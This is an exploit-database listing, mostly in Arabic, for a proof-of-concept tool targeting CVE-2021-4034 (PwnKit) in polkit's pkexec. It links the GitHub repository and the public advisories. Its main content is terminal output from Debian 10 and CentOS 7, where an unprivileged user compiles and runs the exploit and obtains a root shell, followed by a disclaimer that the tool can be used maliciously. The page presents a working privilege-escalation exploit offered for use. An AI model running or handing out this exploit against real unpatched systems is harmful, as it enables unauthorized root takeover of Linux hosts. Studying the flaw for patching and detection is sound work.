## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YAKUMWAMBA-POC-CVE-2021-4034

# **CVE-2021-4034**
على الرغم من أن هذه الثغرة الأمنية غير قابلة للاستغلال عن بُعد ولا تسمح بحد ذاتها بتنفيذ تعليمات برمجية عشوائية، إلا أنها يمكن أن يستخدمها المهاجمون الذين تمكنوا بالفعل من الحصول على موطئ قدم على مضيف ضعيف لتصعيد صلاحياتهم وتحقيق تلك القدرة.
https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
# **PoC**
تم التحقق منه على Debian 10 و CentOS 7.
يمكنك العثور على المستودع عبر هذا الرابط ← https://github.com/Yakumwamba/POC-CVE-2021-4034.git
root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
root@kitploit:~
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
## إخلاء مسؤولية - يمكن استخدام هذه الأداة بشكل خبيث
يمكن استخدامها أيضًا لإلحاق الضرر بخوادم Linux غير المحدثة أو تعطيلها. مؤلف هذه الأداة غير مسؤول عن أي أضرار أو خسائر قد تحدث نتيجة استخدامها.